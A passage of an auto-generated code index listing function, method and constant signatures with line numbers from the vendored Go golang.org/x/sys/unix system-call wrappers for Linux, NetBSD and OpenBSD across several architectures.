SetPC(pc uint64) { r.Eip = int32(pc) } method SetLen (line 296) | func (iov *Iovec) SetLen(length int) { method SetControllen (line 300) | func (msghdr *Msghdr) SetControllen(length int) { method SetIovlen (line 304) | func (msghdr *Msghdr) SetIovlen(length int) { method SetLen (line 308) | func (cmsg *Cmsghdr) SetLen(length int) { method SetServiceNameLen (line 312) | func (rsa *RawSockaddrNFCLLCP) SetServiceNameLen(length int) { FILE: vendor/golang.org/x/sys/unix/syscall_linux_amd64.go function Lstat (line 26) | func Lstat(path string, stat *Stat_t) (err error) { function Select (line 37) | func Select(nfd int, r *FdSet, w *FdSet, e *FdSet, timeout *Timeval) (n ... function Stat (line 51) | func Stat(path string, stat *Stat_t) (err error) { function Gettimeofday (line 79) | func Gettimeofday(tv *Timeval) (err error) { function Time (line 87) | func Time(t *Time_t) (tt Time_t, err error) { function setTimespec (line 102) | func setTimespec(sec, nsec int64) Timespec { function setTimeval (line 106) | func setTimeval(sec, usec int64) Timeval { method PC (line 110) | func (r *PtraceRegs) PC() uint64 { return r.Rip } method SetPC (line 112) | func (r *PtraceRegs) SetPC(pc uint64) { r.Rip = pc } method SetLen (line 114) | func (iov *Iovec) SetLen(length int) { method SetControllen (line 118) | func (msghdr *Msghdr) SetControllen(length int) { method SetIovlen (line 122) | func (msghdr *Msghdr) SetIovlen(length int) { method SetLen (line 126) | func (cmsg *Cmsghdr) SetLen(length int) { method SetServiceNameLen (line 130) | func (rsa *RawSockaddrNFCLLCP) SetServiceNameLen(length int) { function KexecFileLoad (line 136) | func KexecFileLoad(kernelFd int, initrdFd int, cmdline string, flags int... FILE: vendor/golang.org/x/sys/unix/syscall_linux_amd64_gc.go function gettimeofday (line 12) | func gettimeofday(tv *Timeval) (err syscall.Errno) FILE: vendor/golang.org/x/sys/unix/syscall_linux_arm.go function setTimespec (line 13) | func setTimespec(sec, nsec int64) Timespec { function setTimeval (line 17) | func setTimeval(sec, usec int64) Timeval { function Seek (line 21) | func Seek(fd int, offset int64, whence int) (newoffset int64, err error) { function Time (line 72) | func Time(t *Time_t) (Time_t, error) { function Utime (line 84) | func Utime(path string, buf *Utimbuf) error { function Fadvise (line 99) | func Fadvise(fd int, offset int64, length int64, advice int) (err error) { function Fstatfs (line 109) | func Fstatfs(fd int, buf *Statfs_t) (err error) { function Statfs (line 117) | func Statfs(path string, buf *Statfs_t) (err error) { function mmap (line 129) | func mmap(addr uintptr, length uintptr, prot int, flags int, fd int, off... type rlimit32 (line 137) | type rlimit32 struct constant rlimInf32 (line 144) | rlimInf32 = ^uint32(0) constant rlimInf64 (line 145) | rlimInf64 = ^uint64(0) function Getrlimit (line 147) | func Getrlimit(resource int, rlim *Rlimit) (err error) { method PC (line 173) | func (r *PtraceRegs) PC() uint64 { return uint64(r.Uregs[15]) } method SetPC (line 175) | func (r *PtraceRegs) SetPC(pc uint64) { r.Uregs[15] = uint32(pc) } method SetLen (line 177) | func (iov *Iovec) SetLen(length int) { method SetControllen (line 181) | func (msghdr *Msghdr) SetControllen(length int) { method SetIovlen (line 185) | func (msghdr *Msghdr) SetIovlen(length int) { method SetLen (line 189) | func (cmsg *Cmsghdr) SetLen(length int) { method SetServiceNameLen (line 193) | func (rsa *RawSockaddrNFCLLCP) SetServiceNameLen(length int) { function SyncFileRange (line 199) | func SyncFileRange(fd int, off int64, n int64, flags int) error { function KexecFileLoad (line 207) | func KexecFileLoad(kernelFd int, initrdFd int, cmdline string, flags int... FILE: vendor/golang.org/x/sys/unix/syscall_linux_arm64.go function Select (line 30) | func Select(nfd int, r *FdSet, w *FdSet, e *FdSet, timeout *Timeval) (n ... function Stat (line 44) | func Stat(path string, stat *Stat_t) (err error) { function Lchown (line 48) | func Lchown(path string, uid int, gid int) (err error) { function Lstat (line 52) | func Lstat(path string, stat *Stat_t) (err error) { function Ustat (line 60) | func Ustat(dev int, ubuf *Ustat_t) (err error) { function setTimespec (line 83) | func setTimespec(sec, nsec int64) Timespec { function setTimeval (line 87) | func setTimeval(sec, usec int64) Timeval { function futimesat (line 91) | func futimesat(dirfd int, path string, tv *[2]Timeval) (err error) { function Time (line 103) | func Time(t *Time_t) (Time_t, error) { function Utime (line 115) | func Utime(path string, buf *Utimbuf) error { function utimes (line 123) | func utimes(path string, tv *[2]Timeval) (err error) { function Getrlimit (line 136) | func Getrlimit(resource int, rlim *Rlimit) error { method PC (line 144) | func (r *PtraceRegs) PC() uint64 { return r.Pc } method SetPC (line 146) | func (r *PtraceRegs) SetPC(pc uint64) { r.Pc = pc } method SetLen (line 148) | func (iov *Iovec) SetLen(length int) { method SetControllen (line 152) | func (msghdr *Msghdr) SetControllen(length int) { method SetIovlen (line 156) | func (msghdr *Msghdr) SetIovlen(length int) { method SetLen (line 160) | func (cmsg *Cmsghdr) SetLen(length int) { method SetServiceNameLen (line 164) | func (rsa *RawSockaddrNFCLLCP) SetServiceNameLen(length int) { function Pause (line 168) | func Pause() error { function KexecFileLoad (line 175) | func KexecFileLoad(kernelFd int, initrdFd int, cmdline string, flags int... FILE: vendor/golang.org/x/sys/unix/syscall_linux_gc.go function SyscallNoError (line 10) | func SyscallNoError(trap, a1, a2, a3 uintptr) (r1, r2 uintptr) function RawSyscallNoError (line 14) | func RawSyscallNoError(trap, a1, a2, a3 uintptr) (r1, r2 uintptr) FILE: vendor/golang.org/x/sys/unix/syscall_linux_gc_386.go function seek (line 13) | func seek(fd int, offset int64, whence int) (newoffset int64, err syscal... function socketcall (line 15) | func socketcall(call int, a0, a1, a2, a3, a4, a5 uintptr) (n int, err sy... function rawsocketcall (line 16) | func rawsocketcall(call int, a0, a1, a2, a3, a4, a5 uintptr) (n int, err... FILE: vendor/golang.org/x/sys/unix/syscall_linux_gc_arm.go function seek (line 13) | func seek(fd int, offset int64, whence int) (newoffset int64, err syscal... FILE: vendor/golang.org/x/sys/unix/syscall_linux_gccgo_386.go function seek (line 14) | func seek(fd int, offset int64, whence int) (int64, syscall.Errno) { function socketcall (line 22) | func socketcall(call int, a0, a1, a2, a3, a4, a5 uintptr) (int, syscall.... function rawsocketcall (line 27) | func rawsocketcall(call int, a0, a1, a2, a3, a4, a5 uintptr) (int, sysca... FILE: vendor/golang.org/x/sys/unix/syscall_linux_gccgo_arm.go function seek (line 14) | func seek(fd int, offset int64, whence int) (int64, syscall.Errno) { FILE: vendor/golang.org/x/sys/unix/syscall_linux_loong64.go function Select (line 25) | func Select(nfd int, r *FdSet, w *FdSet, e *FdSet, timeout *Timeval) (n ... function timespecFromStatxTimestamp (line 39) | func timespecFromStatxTimestamp(x StatxTimestamp) Timespec { function Fstatat (line 46) | func Fstatat(fd int, path string, stat *Stat_t, flags int) error { function Fstat (line 72) | func Fstat(fd int, stat *Stat_t) (err error) { function Stat (line 76) | func Stat(path string, stat *Stat_t) (err error) { function Lchown (line 80) | func Lchown(path string, uid int, gid int) (err error) { function Lstat (line 84) | func Lstat(path string, stat *Stat_t) (err error) { function Ustat (line 92) | func Ustat(dev int, ubuf *Ustat_t) (err error) { function setTimespec (line 115) | func setTimespec(sec, nsec int64) Timespec { function setTimeval (line 119) | func setTimeval(sec, usec int64) Timeval { function Getrlimit (line 123) | func Getrlimit(resource int, rlim *Rlimit) (err error) { function futimesat (line 128) | func futimesat(dirfd int, path string, tv *[2]Timeval) (err error) { function Time (line 140) | func Time(t *Time_t) (Time_t, error) { function Utime (line 152) | func Utime(path string, buf *Utimbuf) error { function utimes (line 160) | func utimes(path string, tv *[2]Timeval) (err error) { method PC (line 172) | func (r *PtraceRegs) PC() uint64 { return r.Era } method SetPC (line 174) | func (r *PtraceRegs) SetPC(era uint64) { r.Era = era } method SetLen (line 176) | func (iov *Iovec) SetLen(length int) { method SetControllen (line 180) | func (msghdr *Msghdr) SetControllen(length int) { method SetIovlen (line 184) | func (msghdr *Msghdr) SetIovlen(length int) { method SetLen (line 188) | func (cmsg *Cmsghdr) SetLen(length int) { method SetServiceNameLen (line 192) | func (rsa *RawSockaddrNFCLLCP) SetServiceNameLen(length int) { function Pause (line 196) | func Pause() error { function Renameat (line 201) | func Renameat(olddirfd int, oldpath string, newdirfd int, newpath string... function KexecFileLoad (line 207) | func KexecFileLoad(kernelFd int, initrdFd int, cmdline string, flags int... FILE: vendor/golang.org/x/sys/unix/syscall_linux_mips64x.go function Select (line 27) | func Select(nfd int, r *FdSet, w *FdSet, e *FdSet, timeout *Timeval) (n ... function Time (line 64) | func Time(t *Time_t) (tt Time_t, err error) { function setTimespec (line 79) | func setTimespec(sec, nsec int64) Timespec { function setTimeval (line 83) | func setTimeval(sec, usec int64) Timeval { function Ioperm (line 87) | func Ioperm(from int, num int, on int) (err error) { function Iopl (line 91) | func Iopl(level int) (err error) { type stat_t (line 95) | type stat_t struct function Fstat (line 122) | func Fstat(fd int, s *Stat_t) (err error) { function Fstatat (line 129) | func Fstatat(dirfd int, path string, s *Stat_t, flags int) (err error) { function Lstat (line 136) | func Lstat(path string, s *Stat_t) (err error) { function Stat (line 143) | func Stat(path string, s *Stat_t) (err error) { function fillStat_t (line 150) | func fillStat_t(s *Stat_t, st *stat_t) { method PC (line 166) | func (r *PtraceRegs) PC() uint64 { return r.Epc } method SetPC (line 168) | func (r *PtraceRegs) SetPC(pc uint64) { r.Epc = pc } method SetLen (line 170) | func (iov *Iovec) SetLen(length int) { method SetControllen (line 174) | func (msghdr *Msghdr) SetControllen(length int) { method SetIovlen (line 178) | func (msghdr *Msghdr) SetIovlen(length int) { method SetLen (line 182) | func (cmsg *Cmsghdr) SetLen(length int) { method SetServiceNameLen (line 186) | func (rsa *RawSockaddrNFCLLCP) SetServiceNameLen(length int) { FILE: vendor/golang.org/x/sys/unix/syscall_linux_mipsx.go function Syscall9 (line 14) | func Syscall9(trap, a1, a2, a3, a4, a5, a6, a7, a8, a9 uintptr) (r1, r2 ... function Fstatfs (line 70) | func Fstatfs(fd int, buf *Statfs_t) (err error) { function Statfs (line 78) | func Statfs(path string, buf *Statfs_t) (err error) { function Seek (line 90) | func Seek(fd int, offset int64, whence int) (off int64, err error) { function setTimespec (line 98) | func setTimespec(sec, nsec int64) Timespec { function setTimeval (line 102) | func setTimeval(sec, usec int64) Timeval { function mmap (line 108) | func mmap(addr uintptr, length uintptr, prot int, flags int, fd int, off... constant rlimInf32 (line 116) | rlimInf32 = ^uint32(0) constant rlimInf64 (line 117) | rlimInf64 = ^uint64(0) type rlimit32 (line 119) | type rlimit32 struct function Getrlimit (line 126) | func Getrlimit(resource int, rlim *Rlimit) (err error) { method PC (line 152) | func (r *PtraceRegs) PC() uint64 { return r.Epc } method SetPC (line 154) | func (r *PtraceRegs) SetPC(pc uint64) { r.Epc = pc } method SetLen (line 156) | func (iov *Iovec) SetLen(length int) { method SetControllen (line 160) | func (msghdr *Msghdr) SetControllen(length int) { method SetIovlen (line 164) | func (msghdr *Msghdr) SetIovlen(length int) { method SetLen (line 168) | func (cmsg *Cmsghdr) SetLen(length int) { method SetServiceNameLen (line 172) | func (rsa *RawSockaddrNFCLLCP) SetServiceNameLen(length int) { FILE: vendor/golang.org/x/sys/unix/syscall_linux_ppc.go function Fadvise (line 63) | func Fadvise(fd int, offset int64, length int64, advice int) (err error) { function seek (line 71) | func seek(fd int, offset int64, whence int) (int64, syscall.Errno) { function Seek (line 79) | func Seek(fd int, offset int64, whence int) (newoffset int64, err error) { function Fstatfs (line 87) | func Fstatfs(fd int, buf *Statfs_t) (err error) { function Statfs (line 95) | func Statfs(path string, buf *Statfs_t) (err error) { function mmap (line 109) | func mmap(addr uintptr, length uintptr, prot int, flags int, fd int, off... function setTimespec (line 117) | func setTimespec(sec, nsec int64) Timespec { function setTimeval (line 121) | func setTimeval(sec, usec int64) Timeval { type rlimit32 (line 125) | type rlimit32 struct constant rlimInf32 (line 132) | rlimInf32 = ^uint32(0) constant rlimInf64 (line 133) | rlimInf64 = ^uint64(0) function Getrlimit (line 135) | func Getrlimit(resource int, rlim *Rlimit) (err error) { method PC (line 161) | func (r *PtraceRegs) PC() uint32 { return r.Nip } method SetPC (line 163) | func (r *PtraceRegs) SetPC(pc uint32) { r.Nip = pc } method SetLen (line 165) | func (iov *Iovec) SetLen(length int) { method SetControllen (line 169) | func (msghdr *Msghdr) SetControllen(length int) { method SetIovlen (line 173) | func (msghdr *Msghdr) SetIovlen(length int) { method SetLen (line 177) | func (cmsg *Cmsghdr) SetLen(length int) { method SetServiceNameLen (line 181) | func (rsa *RawSockaddrNFCLLCP) SetServiceNameLen(length int) { function SyncFileRange (line 187) | func SyncFileRange(fd int, off int64, n int64, flags int) error { function KexecFileLoad (line 195) | func KexecFileLoad(kernelFd int, initrdFd int, cmdline string, flags int... FILE: vendor/golang.org/x/sys/unix/syscall_linux_ppc64x.go function setTimespec (line 64) | func setTimespec(sec, nsec int64) Timespec { function setTimeval (line 68) | func setTimeval(sec, usec int64) Timeval { method PC (line 72) | func (r *PtraceRegs) PC() uint64 { return r.Nip } method SetPC (line 74) | func (r *PtraceRegs) SetPC(pc uint64) { r.Nip = pc } method SetLen (line 76) | func (iov *Iovec) SetLen(length int) { method SetControllen (line 80) | func (msghdr *Msghdr) SetControllen(length int) { method SetIovlen (line 84) | func (msghdr *Msghdr) SetIovlen(length int) { method SetLen (line 88) | func (cmsg *Cmsghdr) SetLen(length int) { method SetServiceNameLen (line 92) | func (rsa *RawSockaddrNFCLLCP) SetServiceNameLen(length int) { function SyncFileRange (line 98) | func SyncFileRange(fd int, off int64, n int64, flags int) error { function KexecFileLoad (line 106) | func KexecFileLoad(kernelFd int, initrdFd int, cmdline string, flags int... FILE: vendor/golang.org/x/sys/unix/syscall_linux_riscv64.go function Select (line 29) | func Select(nfd int, r *FdSet, w *FdSet, e *FdSet, timeout *Timeval) (n ... function Stat (line 43) | func Stat(path string, stat *Stat_t) (err error) { function Lchown (line 47) | func Lchown(path string, uid int, gid int) (err error) { function Lstat (line 51) | func Lstat(path string, stat *Stat_t) (err error) { function Ustat (line 59) | func Ustat(dev int, ubuf *Ustat_t) (err error) { function setTimespec (line 82) | func setTimespec(sec, nsec int64) Timespec { function setTimeval (line 86) | func setTimeval(sec, usec int64) Timeval { function futimesat (line 90) | func futimesat(dirfd int, path string, tv *[2]Timeval) (err error) { function Time (line 102) | func Time(t *Time_t) (Time_t, error) { function Utime (line 114) | func Utime(path string, buf *Utimbuf) error { function utimes (line 122) | func utimes(path string, tv *[2]Timeval) (err error) { method PC (line 134) | func (r *PtraceRegs) PC() uint64 { return r.Pc } method SetPC (line 136) | func (r *PtraceRegs) SetPC(pc uint64) { r.Pc = pc } method SetLen (line 138) | func (iov *Iovec) SetLen(length int) { method SetControllen (line 142) | func (msghdr *Msghdr) SetControllen(length int) { method SetIovlen (line 146) | func (msghdr *Msghdr) SetIovlen(length int) { method SetLen (line 150) | func (cmsg *Cmsghdr) SetLen(length int) { method SetServiceNameLen (line 154) | func (rsa *RawSockaddrNFCLLCP) SetServiceNameLen(length int) { function Pause (line 158) | func Pause() error { function Renameat (line 163) | func Renameat(olddirfd int, oldpath string, newdirfd int, newpath string... function KexecFileLoad (line 169) | func KexecFileLoad(kernelFd int, initrdFd int, cmdline string, flags int... function RISCVHWProbe (line 182) | func RISCVHWProbe(pairs []RISCVHWProbePairs, set *CPUSet, flags uint) (e... FILE: vendor/golang.org/x/sys/unix/syscall_linux_s390x.go function Time (line 48) | func Time(t *Time_t) (tt Time_t, err error) { function setTimespec (line 63) | func setTimespec(sec, nsec int64) Timespec { function setTimeval (line 67) | func setTimeval(sec, usec int64) Timeval { function Ioperm (line 71) | func Ioperm(from int, num int, on int) (err error) { function Iopl (line 75) | func Iopl(level int) (err error) { method PC (line 79) | func (r *PtraceRegs) PC() uint64 { return r.Psw.Addr } method SetPC (line 81) | func (r *PtraceRegs) SetPC(pc uint64) { r.Psw.Addr = pc } method SetLen (line 83) | func (iov *Iovec) SetLen(length int) { method SetControllen (line 87) | func (msghdr *Msghdr) SetControllen(length int) { method SetIovlen (line 91) | func (msghdr *Msghdr) SetIovlen(length int) { method SetLen (line 95) | func (cmsg *Cmsghdr) SetLen(length int) { method SetServiceNameLen (line 99) | func (rsa *RawSockaddrNFCLLCP) SetServiceNameLen(length int) { function mmap (line 105) | func mmap(addr uintptr, length uintptr, prot int, flags int, fd int, off... constant netSocket (line 120) | netSocket = 1 constant netBind (line 121) | netBind = 2 constant netConnect (line 122) | netConnect = 3 constant netListen (line 123) | netListen = 4 constant netAccept (line 124) | netAccept = 5 constant netGetSockName (line 125) | netGetSockName = 6 constant netGetPeerName (line 126) | netGetPeerName = 7 constant netSocketPair (line 127) | netSocketPair = 8 constant netSend (line 128) | netSend = 9 constant netRecv (line 129) | netRecv = 10 constant netSendTo (line 130) | netSendTo = 11 constant netRecvFrom (line 131) | netRecvFrom = 12 constant netShutdown (line 132) | netShutdown = 13 constant netSetSockOpt (line 133) | netSetSockOpt = 14 constant netGetSockOpt (line 134) | netGetSockOpt = 15 constant netSendMsg (line 135) | netSendMsg = 16 constant netRecvMsg (line 136) | netRecvMsg = 17 constant netAccept4 (line 137) | netAccept4 = 18 constant netRecvMMsg (line 138) | netRecvMMsg = 19 constant netSendMMsg (line 139) | netSendMMsg = 20 function accept4 (line 142) | func accept4(s int, rsa *RawSockaddrAny, addrlen *_Socklen, flags int) (... function getsockname (line 151) | func getsockname(s int, rsa *RawSockaddrAny, addrlen *_Socklen) error { function getpeername (line 160) | func getpeername(s int, rsa *RawSockaddrAny, addrlen *_Socklen) error { function socketpair (line 169) | func socketpair(domain int, typ int, flags int, fd *[2]int32) error { function bind (line 178) | func bind(s int, addr unsafe.Pointer, addrlen _Socklen) error { function connect (line 187) | func connect(s int, addr unsafe.Pointer, addrlen _Socklen) error { function socket (line 196) | func socket(domain int, typ int, proto int) (int, error) { function getsockopt (line 205) | func getsockopt(s int, level int, name int, val unsafe.Pointer, vallen *... function setsockopt (line 214) | func setsockopt(s int, level int, name int, val unsafe.Pointer, vallen u... function recvfrom (line 223) | func recvfrom(s int, p []byte, flags int, from *RawSockaddrAny, fromlen ... function sendto (line 236) | func sendto(s int, p []byte, flags int, to unsafe.Pointer, addrlen _Sock... function recvmsg (line 249) | func recvmsg(s int, msg *Msghdr, flags int) (int, error) { function sendmsg (line 258) | func sendmsg(s int, msg *Msghdr, flags int) (int, error) { function Listen (line 267) | func Listen(s int, n int) error { function Shutdown (line 276) | func Shutdown(s, how int) error { function KexecFileLoad (line 287) | func KexecFileLoad(kernelFd int, initrdFd int, cmdline string, flags int... FILE: vendor/golang.org/x/sys/unix/syscall_linux_sparc64.go function Ioperm (line 56) | func Ioperm(from int, num int, on int) (err error) { function Iopl (line 60) | func Iopl(level int) (err error) { function Time (line 67) | func Time(t *Time_t) (tt Time_t, err error) { function setTimespec (line 82) | func setTimespec(sec, nsec int64) Timespec { function setTimeval (line 86) | func setTimeval(sec, usec int64) Timeval { method PC (line 90) | func (r *PtraceRegs) PC() uint64 { return r.Tpc } method SetPC (line 92) | func (r *PtraceRegs) SetPC(pc uint64) { r.Tpc = pc } method SetLen (line 94) | func (iov *Iovec) SetLen(length int) { method SetControllen (line 98) | func (msghdr *Msghdr) SetControllen(length int) { method SetIovlen (line 102) | func (msghdr *Msghdr) SetIovlen(length int) { method SetLen (line 106) | func (cmsg *Cmsghdr) SetLen(length int) { method SetServiceNameLen (line 110) | func (rsa *RawSockaddrNFCLLCP) SetServiceNameLen(length int) { FILE: vendor/golang.org/x/sys/unix/syscall_netbsd.go type SockaddrDatalink (line 21) | type SockaddrDatalink struct function anyToSockaddrGOOS (line 33) | func anyToSockaddrGOOS(fd int, rsa *RawSockaddrAny) (Sockaddr, error) { function Syscall9 (line 37) | func Syscall9(trap, a1, a2, a3, a4, a5, a6, a7, a8, a9 uintptr) (r1, r2 ... function sysctlNodes (line 39) | func sysctlNodes(mib []_C_int) (nodes []Sysctlnode, err error) { function nametomib (line 62) | func nametomib(name string) (mib []_C_int, err error) { function direntIno (line 100) | func direntIno(buf []byte) (uint64, bool) { function direntReclen (line 104) | func direntReclen(buf []byte) (uint64, bool) { function direntNamlen (line 108) | func direntNamlen(buf []byte) (uint64, bool) { function SysctlUvmexp (line 112) | func SysctlUvmexp(name string) (*Uvmexp, error) { function Pipe (line 126) | func Pipe(p []int) (err error) { function Pipe2 (line 132) | func Pipe2(p []int, flags int) error { function Getdirentries (line 147) | func Getdirentries(fd int, buf []byte, basep *uintptr) (n int, err error) { function sendfile (line 175) | func sendfile(outfd int, infd int, offset *int64, count int) (written in... function IoctlGetPtmget (line 184) | func IoctlGetPtmget(fd int, req uint) (*Ptmget, error) { function Uname (line 190) | func Uname(uname *Utsname) error { function Sendfile (line 236) | func Sendfile(outfd int, infd int, offset *int64, count int) (written in... function Fstatvfs (line 243) | func Fstatvfs(fd int, buf *Statvfs_t) (err error) { function Statvfs (line 247) | func Statvfs(path string, buf *Statvfs_t) (err error) { constant mremapFixed (line 362) | mremapFixed = MAP_FIXED constant mremapDontunmap (line 363) | mremapDontunmap = 0 constant mremapMaymove (line 364) | mremapMaymove = 0 function mremap (line 369) | func mremap(oldaddr uintptr, oldlength uintptr, newlength uintptr, flags... FILE: vendor/golang.org/x/sys/unix/syscall_netbsd_386.go function setTimespec (line 9) | func setTimespec(sec, nsec int64) Timespec { function setTimeval (line 13) | func setTimeval(sec, usec int64) Timeval { function SetKevent (line 17) | func SetKevent(k *Kevent_t, fd, mode, flags int) { method SetLen (line 23) | func (iov *Iovec) SetLen(length int) { method SetControllen (line 27) | func (msghdr *Msghdr) SetControllen(length int) { method SetIovlen (line 31) | func (msghdr *Msghdr) SetIovlen(length int) { method SetLen (line 35) | func (cmsg *Cmsghdr) SetLen(length int) { FILE: vendor/golang.org/x/sys/unix/syscall_netbsd_amd64.go function setTimespec (line 9) | func setTimespec(sec, nsec int64) Timespec { function setTimeval (line 13) | func setTimeval(sec, usec int64) Timeval { function SetKevent (line 17) | func SetKevent(k *Kevent_t, fd, mode, flags int) { method SetLen (line 23) | func (iov *Iovec) SetLen(length int) { method SetControllen (line 27) | func (msghdr *Msghdr) SetControllen(length int) { method SetIovlen (line 31) | func (msghdr *Msghdr) SetIovlen(length int) { method SetLen (line 35) | func (cmsg *Cmsghdr) SetLen(length int) { FILE: vendor/golang.org/x/sys/unix/syscall_netbsd_arm.go function setTimespec (line 9) | func setTimespec(sec, nsec int64) Timespec { function setTimeval (line 13) | func setTimeval(sec, usec int64) Timeval { function SetKevent (line 17) | func SetKevent(k *Kevent_t, fd, mode, flags int) { method SetLen (line 23) | func (iov *Iovec) SetLen(length int) { method SetControllen (line 27) | func (msghdr *Msghdr) SetControllen(length int) { method SetIovlen (line 31) | func (msghdr *Msghdr) SetIovlen(length int) { method SetLen (line 35) | func (cmsg *Cmsghdr) SetLen(length int) { FILE: vendor/golang.org/x/sys/unix/syscall_netbsd_arm64.go function setTimespec (line 9) | func setTimespec(sec, nsec int64) Timespec { function setTimeval (line 13) | func setTimeval(sec, usec int64) Timeval { function SetKevent (line 17) | func SetKevent(k *Kevent_t, fd, mode, flags int) { method SetLen (line 23) | func (iov *Iovec) SetLen(length int) { method SetControllen (line 27) | func (msghdr *Msghdr) SetControllen(length int) { method SetIovlen (line 31) | func (msghdr *Msghdr) SetIovlen(length int) { method SetLen (line 35) | func (cmsg *Cmsghdr) SetLen(length int) { FILE: vendor/golang.org/x/sys/unix/syscall_openbsd.go type SockaddrDatalink (line 22) | type SockaddrDatalink struct function anyToSockaddrGOOS (line 34) | func anyToSockaddrGOOS(fd int, rsa *RawSockaddrAny) (Sockaddr, error) { function Syscall9 (line 38) | func Syscall9(trap, a1, a2, a3, a4, a5, a6, a7, a8, a9 uintptr) (r1, r2 ... function nametomib (line 40) | func nametomib(name string) (mib []_C_int, err error) { function direntIno (line 50) | func direntIno(buf []byte) (uint64, bool) { function direntReclen (line 54) | func direntReclen(buf []byte) (uint64, bool) { function direntNamlen (line 58) | func direntNamlen(buf []byte) (uint64, bool) { function SysctlUvmexp (line 62) | func SysctlUvmexp(name string) (*Uvmexp, error) { function Pipe (line 79) | func Pipe(p []int) (err error) { function Pipe2 (line 85) | func Pipe2(p []int, flags int) error { function Getdirentries (line 100) | func Getdirentries(fd int, buf []byte, basep *uintptr) (n int, err error) { function Sendfile (line 127) | func Sendfile(outfd int, infd int, offset *int64, count int) (written in... function sendfile (line 135) | func sendfile(outfd int, infd int, offset *int64, count int) (written in... function Getfsstat (line 139) | func Getfsstat(buf []Statfs_t, flags int) (n int, err error) { function Getresuid (line 152) | func Getresuid() (ruid, euid, suid int) { function Getresgid (line 158) | func Getresgid() (rgid, egid, sgid int) { function FcntlInt (line 173) | func FcntlInt(fd uintptr, cmd, arg int) (int, error) { function FcntlFlock (line 178) | func FcntlFlock(fd uintptr, cmd int, lk *Flock_t) error { function Ppoll (line 185) | func Ppoll(fds []PollFd, timeout *Timespec, sigmask *Sigset_t) (n int, e... function Uname (line 192) | func Uname(uname *Utsname) error { FILE: vendor/golang.org/x/sys/unix/syscall_openbsd_386.go function setTimespec (line 9) | func setTimespec(sec, nsec int64) Timespec { function setTimeval (line 13) | func setTimeval(sec, usec int64) Timeval { function SetKevent (line 17) | func SetKevent(k *Kevent_t, fd, mode, flags int) { method SetLen (line 23) | func (iov *Iovec) SetLen(length int) { method SetControllen (line 27) | func (msghdr *Msghdr) SetControllen(length int) { method SetIovlen (line 31) | func (msghdr *Msghdr) SetIovlen(length int) { method SetLen (line 35) | func (cmsg *Cmsghdr) SetLen(length int) { constant SYS___SYSCTL (line 41) | SYS___SYSCTL = SYS_SYSCTL FILE: vendor/golang.org/x/sys/unix/syscall_openbsd_amd64.go function setTimespec (line 9) | func setTimespec(sec, nsec int64) Timespec { function setTimeval (line 13) | func setTimeval(sec, usec int64) Timeval { function SetKevent (line 17) | func SetKevent(k *Kevent_t, fd, mode, flags int) { method SetLen (line 23) | func (iov *Iovec) SetLen(length int) { method SetControllen (line 27) | func (msghdr *Msghdr) SetControllen(length int) { method SetIovlen (line 31) | func (msghdr *Msghdr) SetIovlen(length int) { method SetLen (line 35) | func (cmsg *Cmsghdr) SetLen(length int) { constant SYS___SYSCTL (line 41) | SYS___SYSCTL = SYS_SYSCTL FILE: vendor/golang.org/x/sys/unix/syscall_openbsd_arm.go function setTimespec (line 9) | func setTimespec(sec, nsec int64) Timespec { function setTimeval (line 13) | func setTimeval(sec, usec int64) Timeval { function SetKevent (line 17) | func SetKevent(k *Kevent_t, fd, mode, flags int) { method SetLen (line 23) | func (iov *Iovec) SetLen(length int) { method SetControllen (line 27) | func (msghdr *Msghdr) SetControllen(length int) { method SetIovlen (line 31) | func (msghdr *Msghdr) SetIovlen(length int) { method SetLen (line 35) | func (cmsg *Cmsghdr) SetLen(length int) { constant SYS___SYSCTL (line 41) | SYS___SYSCTL = SYS_SYSCTL FILE: vendor/golang.org/x/sys/unix/syscall_openbsd_arm64.go function setTimespec (line 9) | func setTimespec(sec, nsec int64) Timespec { function setTimeval (line 13) | func setTimeval(sec, usec int64) Timeval { function SetKevent (line 17) | func SetKevent(k *Kevent_t, fd, mode, flags int) { method SetLen (line 23) | func (iov *Iovec) SetLen(length int) { method SetControllen (line 27) | func (msghdr *Msghdr) SetControllen(length int) { method SetIovlen (line 31) | func (msghdr *Msghdr) SetIovlen(length int) { method SetLen (line 35) | func (cmsg *Cmsghdr) SetLen(length int) { constant SYS___SYSCTL (line 41) | SYS___SYSCTL = SYS_SYSCTL FILE: vendor/golang.org/x/sys/unix/syscall_openbsd_libc.go function syscall_syscall (line 12) | func syscall_syscall(fn, a1, a2, a3 uintptr) (r1, r2 uintptr, err Errno) function syscall_syscall6 (line 13) | func syscall_syscall6(fn, a1, a2, a3, a4, a5, a6 uintptr) (r1, r2 uintpt... function syscall_syscall10 (line 14) | func syscall_syscall10(fn, a1, a2, a3, a4, a5, a6, a7, a8, a9, a10 uintp... function syscall_rawSyscall (line 15) | func syscall_rawSyscall(fn, a1, a2, a3 uintptr) (r1, r2 uintptr, err Errno) function syscall_rawSyscall6 (line 16) | func syscall_rawSyscall6(fn, a1, a2, a3, a4, a5, a6 uintptr) (r1, r2 uin... function syscall_syscall9 (line 24) | func syscall_syscall9(fn, a1, a2, a3, a4, a5, a6, a7, a8, a9 uintptr) (r... FILE: vendor/golang.org/x/sys/unix/syscall_openbsd_mips64.go function setTimespec (line 7) | func setTimespec(sec, nsec int64) Timespec { function setTimeval (line 11) | func setTimeval(sec, usec int64) Timeval { function SetKevent (line 15) | func SetKevent(k *Kevent_t, fd, mode, flags int) { method SetLen (line 21) | func (iov *Iovec) SetLen(length int) { method SetControllen (line 25) | func (msghdr *Msghdr) SetControllen(length int) { method SetIovlen (line 29) | func (msghdr *Msghdr) SetIovlen(length int) { method SetLen (line 33) | func (cmsg *Cmsghdr) SetLen(length int) { constant SYS___SYSCTL (line 39) | SYS___SYSCTL = SYS_SYSCTL FILE: vendor/golang.org/x/sys/unix/syscall_openbsd_ppc64.go function setTimespec (line 9) | func setTimespec(sec, nsec int64) Timespec { function setTimeval (line 13) | func setTimeval(sec, usec int64) Timeval { function SetKevent (line 17) | func SetKevent(k *Kevent_t, fd, mode, flags int) { method SetLen (line 23) | func (iov *Iovec) SetLen(length int) { method SetControllen (line 27) | func (msghdr *Msghdr) SetControllen(length int) { method SetIovlen (line 31) | func (msghdr *Msghdr) SetIovlen(length int) { method SetLen (line 35) | func (cmsg *Cmsghdr) SetLen(length int) { constant SYS___SYSCTL (line 41) | SYS___SYSCTL = SYS_SYSCTL FILE: vendor/golang.org/x/sys/unix/syscall_openbsd_riscv64.go function setTimespec (line 9) | func setTimespec(sec, nsec int64) Timespec { function setTimeval (line 13) | func setTimeval(sec, usec int64) Timeval { function SetKevent (line 17) | func 